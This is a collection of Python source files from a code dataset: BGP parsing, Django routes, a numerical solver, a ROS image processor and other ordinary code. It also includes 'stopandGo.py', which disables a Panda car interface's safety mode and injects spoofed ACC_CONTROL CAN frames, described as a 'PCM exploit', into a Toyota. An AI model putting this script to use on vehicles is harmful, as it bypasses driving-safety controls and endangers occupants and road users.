ip.split(\":\")\n ip_len = len(ip)\n for _ in range(ip_len, 8):\n ip.append(0)\n ip = \":\".join([str(i).zfill(4) for i in ip])\n return ip\n\ndef prepare_sql_database():\n conn = sqlite3.connect('bgp_stage.db')\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS as_link\n (as_o INTEGER, as_n INTEGER, count INTEGER, last_update INTEGER)''')\n\n c.execute('''CREATE TABLE IF NOT EXISTS prefix_as\n (ip_min TEXT, ip_max TEXT, as_o INTEGER, count INTEGER, last_update INTEGER)''')\n conn.commit()\n conn.close()\n\ndef build_sql_db():\n conn = sqlite3.connect('bgp_stage.db')\n c = conn.cursor()\n\n # Create a new bgpstream instance and a reusable bgprecord instance\n stream = BGPStream()\n rec = BGPRecord()\n\n stream.add_filter('collector','rrc11')\n stream.add_interval_filter(1438417216,1438417316)\n stream.start()\n\n while(stream.get_next_record(rec)):\n if rec.status != \"valid\":\n continue\n else:\n elem = rec.get_next_elem()\n while(elem):\n if elem.type == \"AB\":\n prefix = elem.fields[\"prefix\"]\n as_path = elem.fields[\"as-path\"].split(\" \")\n origin = as_path[-1]\n time = elem.time\n\n\n #IP Prefix database\n ip_min, ip_max = calculate_min_max(prefix)\n c.execute(\"SELECT ip_min FROM prefix_as WHERE ip_min = (?) AND ip_max = (?) AND as_o = (?)\", (ip_min, ip_max, origin))\n row = c.fetchone()\n if len(row) != 0:\n c.execute(\"UPDATE prefix_as SET count = count + 1 WHERE ip_min = (?) AND ip_max = (?) AND as_o = (?)\", (ip_min, ip_max, origin))\n else:\n c.execute(\"INSERT INTO prefix_as VALUES(?,?,?,?,?)\", (ip_min, ip_max, origin, 1, time))\n\n\n #AS link database\n for as1,as2 in zip(as_path, as_path[1:]) :\n c.execute(\"SELECT as_o FROM as_link WHERE as_o = (?) AND as_n = (?)\",(as1,as2))\n row = c.fetchone()\n if len(row) != 0:\n c.execute(\"UPDATE as_link SET count = count + 1 WHERE as_o = (?) AND as_n = (?)\",\n (as1, as2))\n else:\n c.execute(\"INSERT INTO as_link VALUES(?,?,?,?)\", (as1, as2, 1, 0))\n\n elif elem.type == \"WA\":\n prefix = elem.fields[\"prefix\"]\n time = elem.time\n #Needs research\n\n print(rec.project, rec.collector, rec.type, rec.time, rec.status,\n elem.type, elem.peer_address, elem.peer_asn, elem.fields)\n print(prefix,elem.time, \"W\")\n\n print(rec.project, rec.collector, rec.type, rec.time, rec.status,\n elem.type, elem.peer_address, elem.peer_asn, elem.fields)\n elem = rec.get_next_elem()\n conn.commit()\n conn.close()\n\n\ndef test_sql():\n conn = sqlite3.connect('bgp_stage.db')\n c = conn.cursor()\n c.execute(\"SELECT * FROM as_link WHERE as_o = 901022\")\n cursor = c.fetchall()\n if len(cursor) == 0:\n print(\"LOL\")\n for entry in cursor:\n for e in entry:\n print(e,end=\" \")\n print(\"\")\n c.execute(\"UPDATE as_link SET count = count + 1, last_update = (?) WHERE as_o = (?) AND as_n = (?)\", (6666, 9008, 9009))\n c.execute(\"INSERT INTO as_link VALUES(?,?,?,?)\", (90022, 9009, 1, 12345))\n conn.commit()\n conn.close()\n\n\nif __name__ == '__main__':\n build_sql_db()\n prepare_sql_database()\n test_sql()\n ip_min, ip_max = calculate_min_max(\"2001:db8::/32\")\n print(\"[!] Min IP:\", ip_min, \"Max IP:\", ip_max)","sub_path":"bgpBuilder.py","file_name":"bgpBuilder.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"16659820","text":"\"\"\"\n Copyright 2018 EPAM Systems, Inc.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nimport os\nimport shutil\n\nfrom syndicate.commons.log_helper import get_logger\nfrom syndicate.core import CONFIG\nfrom syndicate.core.constants import ARTIFACTS_FOLDER\nfrom syndicate.core.helper import build_path, execute_command_by_path\n\n_LOG = get_logger('java_runtime_assembler')\n\n\ndef assemble_java_mvn_lambdas(bundle_name, project_path):\n src_path = build_path(CONFIG.project_path, project_path)\n _LOG.info(\n 'Going to process java mvn project by path: {0}'.format(src_path))\n target_folder = build_path(CONFIG.project_path,\n ARTIFACTS_FOLDER,\n bundle_name)\n if not os.path.exists(target_folder):\n os.makedirs(target_folder)\n\n _LOG.debug('Target directory: {0}'.format(target_folder))\n execute_command_by_path(command='mvn clean install', path=src_path)\n\n # copy java artifacts to the target folder\n for root, dirs, files in os.walk(src_path):\n for file in files:\n if file.endswith(\".jar\") or file.endswith(\".war\") \\\n or file.endswith(\".zip\"):\n shutil.copyfile(build_path(root, file),\n build_path(target_folder, file))\n\n _LOG.info('Java mvn project was processed successfully')\n","sub_path":"syndicate/core/build/runtime/java.py","file_name":"java.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61713851","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'cars.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^$', 'cars.views.index', name='index'),\n url(r'^car/delete/(?P[0-9]+)/$', 'cars.views.delete_car', name='delete_car'),\n url(r'^car/edit/(?P[0-9]+)/$', 'cars.views.edit_car', name='edit_car'),\n url(r'^filter/(?P[\\w-]+)/$', 'cars.views.filter_color', name='filter_color'),\n url(r'^get_colors/$', 'cars.views.get_colors', name='get_colors'),\n url(r'^reorder/$', 'cars.views.reorder', name='reorder'),\n \n url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"cars/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62494847","text":"\"\"\"\nGiven an integer n, return 1 - n in lexicographical order.\n\nFor example, given 13, return: [1,10,11,12,13,2,3,4,5,6,7,8,9].\n\nPlease optimize your algorithm to use less time and space. The input size may be as large as 5,000,000.\n\"\"\"\nclass Solution:\n def lexicalOrder(self, n):\n \"\"\"\n :type n: int\n :rtype: List[int]\n \"\"\"\n i, count = 1, 0\n res = [0] * n\n while count < n:\n res[count] = i\n if i * 10 <= n:\n i = i * 10\n else:\n i += 1\n if i > n:\n if i % 10 == 0:\n i = i // 10\n else:\n i = i//10 + 1\n while i % 10 == 0:\n i //= 10\n count += 1\n return res\n\ns = Solution()\nprint(s.lexicalOrder(13))\n","sub_path":"leetcode/lexicographicalNumbers/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"43865463","text":"def inner_rk(run_time, state, f_max, dt, rko):\n n_steps = int(run_time // dt)\n print('RK{}: {} seconds in {} steps'.format(rko, run_time, n_steps))\n if rko == 4:\n kc = np.array([0., 1./2. * dt, 1./2. * dt, dt], dtype=dtype)\n update = '{post} + dt * (k1 + 2*k2 + 2*k3 + k4)'\n else:\n kc = np.array([0., 2./3. * dt], dtype=dtype)\n update = '{post} + dt * (k1 + 3*k2)'\n\n results = {pn: np.empty((r.size, n_steps), dtype=dtype) for pn, r in state['rate'].items()}\n dy = {post: ('tau_inv*(' + ('in_{post} + ' if post in state['input'] else '')\n + ' + '.join('h_'+pre for pre in all_pre.keys())+' - {post})').format(post=post)\n for post, all_pre in state['conn'].items()}\n hd = {post: {pre: np.zeros_like(state['rate'][post]) for pre in all_pre}\n for post, all_pre in state['conn'].items()}\n rates = state['rate']\n\n def make_partial(c, post, pre):\n if isinstance(c, csr_matrix):\n return partial(csr_matvec, c.shape[0], c.shape[1], c.indptr, c.indices, c.data, rates[pre], hd[post][pre])\n else:\n return partial(np.dot, c, rates[pre], hd[post][pre])\n dots = {post: {pre: make_partial(conn, post, pre) for pre, conn in iteritems(all_pre)}\n for post, all_pre in iteritems(state['conn'])}\n ud = {}\n for post, pd in iteritems(hd):\n ud[post] = {'h_'+pre: h for pre, h in iteritems(pd)}\n ud[post]['dt'] = dtype(dt/6.) if rko == 4 else dtype(dt/4.)\n ud[post][post] = state['rate'][post]\n ud[post]['tau_inv'] = dtype(1 / 10e-3)\n ka = np.zeros((rko + 1, state['rate'][post].size), dtype=dtype)\n ud[post]['k'] = ka\n ud[post].update({'k{}'.format(i): ka[i, :] for i in range(ka.shape[0])})\n if post in state['input']:\n ud[post]['in_'+post] = state['input'][post]\n for n in range(n_steps):\n for k in range(1, rko+1):\n def get_r(pn):\n return rates[pn] + kc[k - 1] * ud[pn]['k'][k - 1, :]\n [h.fill(0.) for post, all_pre in iteritems(hd) for h in all_pre.values()]\n [dot() for post, all_pre in iteritems(dots) for dot in all_pre.values()]\n for post, rule in iteritems(dy):\n ld = dict(ud[post])\n ld[post] = get_r(post)\n ne.evaluate(rule, local_dict=ld, out=ud[post]['k'][k, :])\n for post, rule in iteritems(dy):\n ne.evaluate(update.format(post=post), local_dict=ud[post], out=rates[post])\n np.clip(rates[post], 0.0, f_max, rates[post])\n results[post][:, n] = rates[post]\n\n return results\n\n\n\n\ndef make_state():\n from snep.library.rates.utils import compute_connections, dtype\n from scipy.sparse import csr_matrix\n check_sanity = 0\n single_array = 1\n if check_sanity:\n n_pc = n_pv = n_som = n_vip = 5\n else:\n n_pc = 317\n n_pv = 15\n n_som = 12\n n_vip = 16\n pops = ['pc', 'pv', 'som', 'vip']\n pop_n = {'pc': n_pc, 'pv': n_pv, 'som': n_som, 'vip': n_vip}\n r_pc = np.zeros(n_pc, dtype=dtype)\n r_pv = np.zeros(n_pv, dtype=dtype)\n r_som = np.zeros(n_som, dtype=dtype)\n r_vip = np.zeros(n_vip, dtype=dtype)\n conn_d = dict(sparse=False, scale=np.infty, f_global=0., d_pre=1., d_post=1., scalar_data=False, fixed_in=True,\n j_scale=False)\n state = {'pops': pops,\n 'n': pop_n,\n 'rate': {'pc': r_pc,\n 'pv': r_pv,\n 'som': r_som,\n 'vip': r_vip},\n 'input': {'pc': 10*np.ones_like(r_pc),\n # 'pv': np.zeros_like(r_pv),\n # 'som': np.zeros_like(r_som),\n 'vip': 1.2*np.ones_like(r_vip)},\n 'conn': {'pc': {'pc': dict(conn_d, p=.1, J=.5),\n 'pv': dict(conn_d, p=.6, J=-1.),\n # 'som': dict(conn_d, p=.55, J=-1.)\n },\n 'pv': {'pc': dict(conn_d, p=.45, J=1.),\n 'pv': dict(conn_d, p=.5, J=-1.),\n 'som': dict(conn_d, p=.6, J=-1.)},\n 'som': {'pc': dict(conn_d, p=.35, J=.9),\n 'vip': dict(conn_d, p=.5, J=-1.)},\n 'vip': {'pc': dict(conn_d, p=.1, J=.8),\n # 'pv': dict(conn_d, p=.1, J=0.),\n 'som': dict(conn_d, p=.45, J=-1.)}\n }\n }\n for post, all_pre in iteritems(state['conn']):\n for pre in all_pre:\n cd = all_pre[pre]\n if check_sanity:\n cd['p'] = 1.\n cd['zero_diagonal'] = pre == post\n cd['N_pre'] = state['n'][pre]\n cd['N_post'] = state['n'][post]\n cd['J'] /= cd['p'] * (state['n'][pre] - 1 if pre == post else state['n'][pre])\n all_pre[pre] = compute_connections(**cd)[0]\n if single_array:\n p_i = {pn: i for i, pn in enumerate(pops)}\n ns = np.array([0] + [state['n'][pn] for pn in pops])\n n = ns.sum()\n idx = np.cumsum(ns)\n c = np.zeros((n, n), dtype=dtype)\n for post in state['conn']:\n i = p_i[post]\n for pre in state['conn'][post]:\n j = p_i[pre]\n cpp = state['conn'][post][pre]\n c[idx[i]:idx[i+1], idx[j]:idx[j+1]] = cpp\n c = csr_matrix(c)\n r_in = np.zeros(n, dtype=dtype)\n for pn in state['input']:\n i = p_i[pn]\n r_in[idx[i]: idx[i+1]] = state['input'][pn]\n state['pops'] = ['all']\n state['n'] = {'all': n}\n state['conn'] = {'all': {'all': c}}\n state['input'] = {'all': r_in}\n state['rate'] = {'all': np.zeros(n, dtype=dtype)}\n state['sub'] = {'all': idx}\n state['spn'] = {'all': pops}\n else:\n state['sub'] = {pn: np.array([0, n]) for pn, n in iteritems(state['n'])}\n state['spn'] = {pn: [pn] for pn, n in iteritems(state['n'])}\n return state\n\n\nst = make_state()\nans = inner_rk(10., st, 10., 0.1, 2)\n","sub_path":"debugging/advanced_debug_problem.py","file_name":"advanced_debug_problem.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"218833304","text":"import pygame\n\nclass Ship():\n\n\tdef __init__(self,ai_settings, screen):\n\t\t\"\"\"Init the ship and set its starting pos\"\"\"\n\t\tself.screen=screen\n\t\tself.ai_settings = ai_settings\n\t\t\n\t\t#load the ship image and get its rect.\n\t\tself.image = pygame.image.load('hat.bmp')\n\t\tself.rect = self.image.get_rect()\n\t\tself.screen_rect = screen.get_rect()\n\t\t\n\t\t#start each new ship at bottom of the screen\n\t\tself.rect.centerx = self.screen_rect.centerx\n\t\tself.rect.bottom = self.screen_rect.bottom\n\t\t\n\t\t#store a dec value for ship's center\n\t\tself.center = float(self.rect.centerx)\n\t\t\n\t\t#movement flag\n\t\tself.moving_right = False\n\t\tself.moving_left = False\n\t\t\n\tdef update(self):\n\t\t\"\"\"update the ship's pos based on movement flag\"\"\"\n\t\tif self.moving_right and self.rect.right < self.screen_rect.right:\n\t\t\tself.center += self.ai_settings.ship_speed_factor\n\t\tif self.moving_left and self.rect.left > 0:\n\t\t\tself.center -= self.ai_settings.ship_speed_factor\n\t\t\t\n\t\t#update rect object from self.center\n\t\tself.rect.centerx = self.center\t\n\t\t\n\tdef blitme(self):\n\t\t\t\"\"\"draw the ship at current loc\"\"\"\n\t\t\tself.screen.blit(self.image,self.rect)\n","sub_path":"testgame/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351519914","text":"#!/usr/bin/env python3\nimport math\n\na, b, x = list(map(int, input().split()))\n\nif 2*x >= a*a*b:\n tan_theta = 2*(b*a*a-x)/(a*a*a)\nelse:\n tan_theta = a*b*b/(2*x)\n\nprint(math.atan(tan_theta)/math.pi*180)\n","sub_path":"abc144/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"489997087","text":"def missingPos():\n arr=list(eval(input()))\n arr.sort()\n for i in range(arr[0], arr[-1]+1):\n if not i in arr:\n print(i)\n break\n if i==0:\n print(arr)\n \nif __name__=='__main__':\n missingPos()\n ","sub_path":"Code/CodeRecords/2538/60617/271058.py","file_name":"271058.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"299502933","text":"#!/usr/bin/env python\n\n\nimport rospy\nfrom cv_bridge import CvBridge\nfrom cv_bridge import CvBridgeError\nfrom sensor_msgs.msg import Image\nimport cv2\nimport rospkg\nfrom threading import Thread\nimport time\nimport numpy as np\nfrom skimage import morphology\nfrom skimage import color\nimport imutils\nfrom pyefd import elliptic_fourier_descriptors\nimport matplotlib.pyplot as plt\nfrom EFD_Calculator import EFD_Calculator\nfrom std_msgs.msg import Float32MultiArray as FloatArray\nfrom geometry_msgs.msg import Pose\nimport scipy as sp\nfrom scipy import signal\n\n \nclass image_processor:\n\n def __init__(self):\n rospy.init_node('image_processor', anonymous=True)\n self.status = False\n self.EFD_publisher = rospy.Publisher('EFD_constants', FloatArray, queue_size= 1)\n self.Pose_publisher = rospy.Publisher('Frame_Pose', Pose, queue_size=1)\n self.EFD_msg = FloatArray()\n\n self.EFD_Calculator = EFD_Calculator(5)\n self.bridge = CvBridge()\n self.minBlobSize = rospy.get_param(\"min blob size\")\n self.maxAutofillSize = rospy.get_param(\"max autofill size\")\n\n rospy.Subscriber('acquired_image', Image, self.ProcessImage)\n\n # create thread\n self.feed_thread = Thread(target=self.FCD, args=())\n self.feed_thread.daemon = True\n self.feed_thread.start()\n rospy.loginfo(\"Thread created\")\n # FPS setup\n self.FPS = 1 / (rospy.get_param('Desired_FPS'))\n self.FPS_MS = int(self.FPS * 1000)\n rospy.loginfo(\"FPS constants set\")\n\n self.waitkeyval = 20\n\n #if not rospy.get_param('use Gazebo cam'):\n # self.use_camera = rospy.get_param('use camera')\n # if self.use_camera:\n # self.waitkeyval = 20\n # else:\n # self.waitkeyval = 1\n\n\n while not rospy.is_shutdown():\n try:\n self.display_frame()\n except AttributeError:\n rospy.loginfo(\"Error, may be temporary\")\n pass\n\n\n\n def FCD(self):\n pose = self.GetPose()\n if self.status:\n gray_img = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)\n self.bin_img = self.filter_image(gray_img)\n self.update_max_cnt()\n FCD_Coeffs = self.EFD_Calculator.calc_coeffs(self.max_contour)\n self.calc_cMax(FCD_Coeffs)\n print(FCD_Coeffs)\n self.EFD_msg.data = self.format_EFD_message_data(FCD_Coeffs)\n self.Pose_publisher.publish(pose)\n self.EFD_publisher.publish(self.EFD_msg)\n rospy.loginfo(\"New frame published\")\n #self.cont_frame = self.bin_img\n time.sleep(self.FPS)\n\n def calc_cMax(self, coeffs):\n N = np.stack((coeffs[2], coeffs[3]))\n C = np.linalg.norm(N, axis=0)\n C_max = sp.signal.argrelextrema(C, np.greater)\n print(\"******\")\n print(\"******\")\n print(\"C max vals: \")\n print(C_max)\n\n def format_EFD_message_data(self, coeffs):\n return coeffs\n\n def update_max_cnt(self):\n # Get max contour\n contours = cv2.findContours(self.bin_img.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n contours = imutils.grab_contours(contours)\n closed_contours = []\n for i in contours:\n if cv2.contourArea(i) > cv2.arcLength(i, True):\n closed_contours.append(i)\n self.max_contour = max(closed_contours, key=cv2.contourArea)\n out = np.zeros(self.bin_img.shape, np.uint8)\n cv2.drawContours(out, [self.max_contour], -1, 255, cv2.FILLED)\n bin_mask = cv2.bitwise_and(self.bin_img, out)\n\n masked_img = cv2.bitwise_and(self.frame, self.frame, mask = bin_mask)\n\n\n # calc center of contour\n M = cv2.moments(self.max_contour)\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n\n # draw contour and center\n cv2.drawContours(masked_img, [self.max_contour], -1, (0, 255, 0), 2)\n cv2.circle(masked_img, (cX, cY), 7, (255, 255, 255), -1)\n cv2.putText(masked_img, \"center\", (cX - 20, cY - 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)\n self.cont_frame = masked_img\n\n\n def convert_to_cv2(self, data):\n rospy.loginfo(\"image received\")\n self.frame = self.bridge.imgmsg_to_cv2(data, desired_encoding='passthrough')\n\n\n def ProcessImage(self, data):\n self.convert_to_cv2(data)\n self.status = True\n self.FCD()\n\n def GetPose(self):\n return Pose()\n\n def filter_image(self,img):\n bin_img = color.rgb2gray(img)\n #bin_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Adaptive threshold -> binary image\n gray_bi = cv2.medianBlur(bin_img, 5)\n #gray_bi = cv2.GaussianBlur(img, (5,5), 0)\n #gray_bi = cv2.threshold(gray_bi, 60, 255, cv2.THRESH_BINARY)[1]\n gray_bi = cv2.adaptiveThreshold(gray_bi, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 25, 3)\n gray_bi_array = np.array(gray_bi)\n\n gray_size_filtered = gray_bi_array == 0\n\n #filter noise, fill gaps, and close contours\n gray_size_filtered = morphology.remove_small_objects(gray_size_filtered, min_size=self.minBlobSize)\n gray_size_filtered = morphology.remove_small_holes(gray_size_filtered, self.maxAutofillSize)\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(9,9))\n gray_size_filtered = gray_size_filtered.astype(np.uint8) # convert to an unsigned byte\n gray_size_filtered *= 255\n\n gray_size_filtered = cv2.morphologyEx(gray_size_filtered, cv2.MORPH_CLOSE, kernel)\n # blob fill in\n bi_filled = gray_size_filtered.copy()\n h, w = gray_size_filtered.shape[:2]\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.floodFill(bi_filled, mask, (0, 0), 255)\n bi_filled_inv = cv2.bitwise_not(bi_filled)\n final = gray_size_filtered | bi_filled_inv\n return final\n\n def display_frame(self):\n \"\"\"\n updates the view windows so the user can observe\n \"\"\"\n try:\n cv2.imshow('frame',self.cont_frame)\n cv2.waitKey(self.waitkeyval)\n except:\n rospy.loginfo(\"No frame\")\n\n\n\nif __name__ == '__main__':\n imageProcessor = image_processor()\n rospy.spin()\n \n\n","sub_path":"src/grasppoints/src/image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21510704","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n# file_name: new_mul.py\n# author: ScCcWe\n# time: 2020/4/27 9:27\nimport os\nimport sys\nfrom multiprocessing import Pool, cpu_count\nimport functools\nfrom colorama import Back, init\n\nif 'win' in sys.platform:\n path_route_format = '\\\\'\nelse:\n path_route_format = '/'\n\ndo_file_path_list = []\ninit(autoreset=True) # in windows\n\n\ndef divide_work_list(func):\n @functools.wraps(func)\n def divide_func(*args):\n tasks_list = func(*args)\n num = cpu_count() if len(tasks_list) > cpu_count() else 2\n # print(num)\n # print(len(tasks_list) / num)\n # print(len(tasks_list) % num)\n # 刚好可以平分的情况\n if len(tasks_list) % num == 0:\n div_num = int(len(tasks_list) / num)\n return [tasks_list[i:i + div_num] for i in range(0, len(tasks_list), div_num)], num\n \n # 无法平分的情况\n # 例如:9/4 = 2.25 div_num = 2 [] -> [ab][ab][ab][abc]\n else:\n div_num = int(len(tasks_list) / num)\n need_list = [tasks_list[i:i + div_num] for i in range(0, len(tasks_list[div_num * 2:]), div_num)]\n need_last_list = tasks_list[div_num * 3:]\n need_list.append(need_last_list)\n return need_list, num\n return divide_func\n\n\n@divide_work_list\ndef get_task_list(root_path):\n task_list = get_all_list(root_path)\n assert len(task_list) >= 2, '选择的root_path路径为空!'\n return task_list\n\n\ndef get_all_list(par_path):\n for file_or_dir in os.listdir(par_path):\n par_path_new = par_path + path_route_format + file_or_dir\n if os.path.isdir(par_path_new):\n get_all_list(par_path_new)\n elif os.path.isfile(par_path_new):\n do_file_path_list.append(par_path_new)\n return do_file_path_list\n\n\ndef main_process(root_path):\n list_divided, cpu_num = get_task_list(root_path)\n print(Back.WHITE + \"待处理的\" + Back.GREEN + \"任务队列\" + Back.WHITE + \"如下:\")\n print(list_divided)\n with Pool(processes=cpu_num) as p:\n for i in range(cpu_num):\n p.apply_async(single_process_worker, args=(list_divided[i], ...))\n \n p.close() # 阻止后续任务提交到进程池,当所有任务执行完成后,工作进程会退出\n p.join() # 等待工作进程结束。调用 join() 前必须先调用 close() 或者 terminate()\n\n\n# 单线程需要完成的工作\ndef single_process_worker():\n ...\n\n\nif __name__ == '__main__':\n main_process(root_path=r'C:\\Users\\hwx827939\\Desktop\\pic')\n","sub_path":"内置方法/多进程/多进程/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380540818","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nf = lambda x : x**2 - 4*x +6\r\nx = np.linspace(-1,6,100)\r\ny = f(x)\r\ngradient = lambda x:2*x -4\r\nx2 = 10\r\nx0 = 0.0\r\nMaxIter = 10\r\nlearning_rate = 0.4\r\nfor i in range(MaxIter):\r\n g = gradient(x2)\r\n b = f(x2)-x2*g\r\n jub = lambda x: x*g+b\r\n y2 = jub(x)\r\n plt.plot(x,y,'-k')\r\n plt.plot(2,2,'sk')\r\n plt.plot(x,y2)\r\n plt.grid()\r\n plt.xlabel('x')\r\n plt.ylabel('y')\r\n plt.show()\r\n x2 = x2 - (f(x2)/gradient(x2))\r\n\r\n\r\n\r\nprint(\"step\\tx\\tf(x)\")\r\nprint(\"{:02d}\\t{:6.5f}\\t{:6.5f}\".format(0,x0,f(x0)))\r\nfor i in range(MaxIter):\r\n x1 = x0-learning_rate*gradient(x0)\r\n x0 = x1\r\n print(\"{:02d}\\t{:6.5f}\\t{:6.5f}\".format(i+1,x0,f(x0)))\r\n","sub_path":"keras/경사하강법시각화.py","file_name":"경사하강법시각화.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"399332011","text":"#!/usr/bin/env python3\nimport sys\nimport os\nfrom panda import Panda\nfrom opendbc.can.packer import CANPacker\n\n\nmax = 500 # increase this if u need more time to start car engine\ndbc_name ='toyota_nodsu_hybrid_pt_generated' # put you correct odbc here (search in values.py)\n\np = Panda()\np.set_safety_mode(Panda.SAFETY_ALLOUTPUT)\n\ndumpsafety = p.health()\nif dumpsafety['safety_mode'] == 0:\n print('Sorry, u need change for some dev branch, if u deserv this copy and past this command:\\n\\n\\ncd ..; rm -rf openpilot; git clone -b master --recurse-submodules https://github.com/commaai/openpilot; reboot')\n exit(1)\n\npacker = CANPacker(dbc_name)\nvalues = {\n \"ACC_TYPE\": 1,\n}\ndata = packer.make_can_msg(\"ACC_CONTROL\", 0, values) # maybe u need change this ACC_CONTROL confirm in your odbc\n\ndef main():\n\n for i in range (0, max):\n print(f\"PCM exploit :{data}\")\n print(' __ __ .___\\n/ \\ / \\ ____ ____ ____ ____ __| _/\\n\\ \\/\\/ // __ \\ / \\_/ __ \\_/ __ \\ / __ | \\n \\ /\\ ___/ | | \\ ___/\\ ___// /_/ | \\n \\__/\\ / \\___ > |___| /\\___ >\\___ >____ | \\n \\/ \\/ \\/ \\/ \\/ \\/ \\n _________ ________ \\n / _____/ ____ / _____/ \\n \\_____ \\ / \\/ \\ ___ \\n / \\ | \\ \\_\\ \\\\\\n/_______ /___| /\\______ /\\n \\/ \\/ \\/ \\n')\n p.can_send(data[0], data[2], data[3])\n progress(i, max, 'start your engine before reach the end')\n if i < (max - 1) :\n os.system('clear')\n \n p.set_safety_mode(Panda.SAFETY_TOYOTA)\n p.send_heartbeat()\n print('\\n\\n\\nrelay ON again\\nkthxbay\\n')\n\n\ndef progress(count, total, status=''):\n bar_len = 50\n filled_len = int(round(bar_len * count / float(total)))\n\n bar = '#' * filled_len + '.' * (bar_len - filled_len)\n\n sys.stdout.write('count :%s of max :%s\\n [%s] \\n...%s' % (count, total, bar, status))\n\nmain()\n","sub_path":"stopandGo.py","file_name":"stopandGo.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"624991393","text":"# -*- coding: utf-8 -*-\n# Copyright 2020 Cohesity Inc.\n\nimport cohesity_management_sdk.models.aws_kms_configuration\nimport cohesity_management_sdk.models.cryptsoft_kms_configuration\n\nclass KmsCreateRequestParameters(object):\n\n \"\"\"Implementation of the 'KmsCreateRequestParameters' model.\n\n Request to create a KMS with specified configuration.\n\n Attributes:\n aws_kms (AwsKmsConfiguration): AWS KMS conifg.\n cryptsoft_kms (CryptsoftKmsConfiguration): Cryptsoft KMS config.\n id (int): The Id of a KMS server.\n server_name (string): Specifies the name given to the KMS Server.\n server_type (ServerTypeKmsCreateRequestParametersEnum): Specifies the\n type of key mangement system.\n 'kInternalKms' indicates an internal KMS object.\n 'kAwsKms' indicates an Aws KMS object.\n 'kCryptsoftKms' indicates a Cryptsoft KMS object.\n\n \"\"\"\n\n # Create a mapping from Model property names to API property names\n _names = {\n \"aws_kms\": 'awsKms',\n \"cryptsoft_kms\": 'cryptsoftKms',\n \"id\": 'id',\n \"server_name\": 'serverName',\n \"server_type\":'serverType'\n }\n\n def __init__(self,\n aws_kms=None,\n cryptsoft_kms=None,\n id=None,\n server_name=None,\n server_type=None):\n \"\"\"Constructor for the KmsCreateRequestParameters class\"\"\"\n\n # Initialize members of the class\n self.aws_kms = aws_kms\n self.cryptsoft_kms = cryptsoft_kms\n self.id = id\n self.server_name = server_name\n self.server_type = server_type\n\n @classmethod\n def from_dictionary(cls,\n dictionary):\n \"\"\"Creates an instance of this model from a dictionary\n\n Args:\n dictionary (dictionary): A dictionary representation of the object as\n obtained from the deserialization of the server's response. The keys\n MUST match property names in the API description.\n\n Returns:\n object: An instance of this structure class.\n\n \"\"\"\n if dictionary is None:\n return None\n\n # Extract variables from the dictionary\n aws_kms = cohesity_management_sdk.models.aws_kms_configuration.AwsKmsConfiguration.from_dictionary(dictionary.get('awsKms')) if dictionary.get('awsKms') else None\n cryptsoft_kms = cohesity_management_sdk.models.cryptsoft_kms_configuration.CryptsoftKmsConfiguration.from_dictionary(dictionary.get('cryptsoftKms')) if dictionary.get('cryptsoftKms') else None\n id = dictionary.get('id')\n server_name = dictionary.get('serverName')\n server_type = dictionary.get('serverType')\n\n # Return an object of this model\n return cls(aws_kms,\n cryptsoft_kms,\n id,\n server_name,\n server_type)\n\n\n","sub_path":"cohesity_management_sdk/models/kms_create_request_parameters.py","file_name":"kms_create_request_parameters.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 